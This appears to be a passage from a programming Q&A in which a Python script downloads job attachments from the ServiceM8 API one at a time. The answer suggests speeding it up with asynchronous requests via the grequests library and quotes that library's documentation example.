        if attachment['related_object_uuid'] == job[0]:
            if attachment['active'] == 1 and attachment['file_type'] != '.pdf' and attachment['attachment_source'] != 'INVOICE_SIGNOFF':
                for staff in staffs.json():
                    if staff['uuid'] == attachment['created_by_staff_uuid']:
                        tech = "{}_{}".format(
                            staff['first'].split()[-1].strip(), staff['last'])
                creation_timestamp = dateutil.parser.parse(
                    attachment['timestamp'])
                creation_date = creation_timestamp.strftime("%d.%m.%y")
                creation_time = creation_timestamp.strftime("%H_%M_%S")
                path = FOLDER + "/{}/{}/SC_-O_D{}_T{}_{}{}".format(
                    job[2], job[1], creation_date, creation_time, tech.upper(), attachment['file_type'])
                # fetch attachment
                if not os.path.isfile(path):
                    url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment['uuid'])
                    r = requests.get(url, auth=(user, passw), stream=True)
                    if r.status_code == 200:
                        if not os.path.exists(FOLDER + "/{}/{}".format(job[2], job[1])):
                            os.makedirs(
                                FOLDER + "/{}/{}".format(job[2], job[1]))
                        print("writing file to path {}".format(path))
                        with open(path, 'wb') as f:
                            r.raw.decode_content = True
                            shutil.copyfileobj(r.raw, f)
                    else:
                        print(r.text)
                else:
                    print("file already exists")
The general idea is to use asynchronous URL requests, and there is a Python module named grequests for that: https://github.com/kennethreitz/grequests
From the documentation:
import grequests

urls = [
    'http://www.heroku.com',
    'http://python-tablib.org',
    'http://httpbin.org',
    'http://python-requests.org',
    'http://fakedomain/',
    'http://kennethreitz.com'
]
# Create a set of unsent Requests:
rs = (grequests.get(u) for u in urls)
# Send them all at the same time:
grequests.map(rs)
And the response:
[<Response [200]>, <Response [200]>, <Response [200]>, <Response [200]>, None, <Response [200]>]
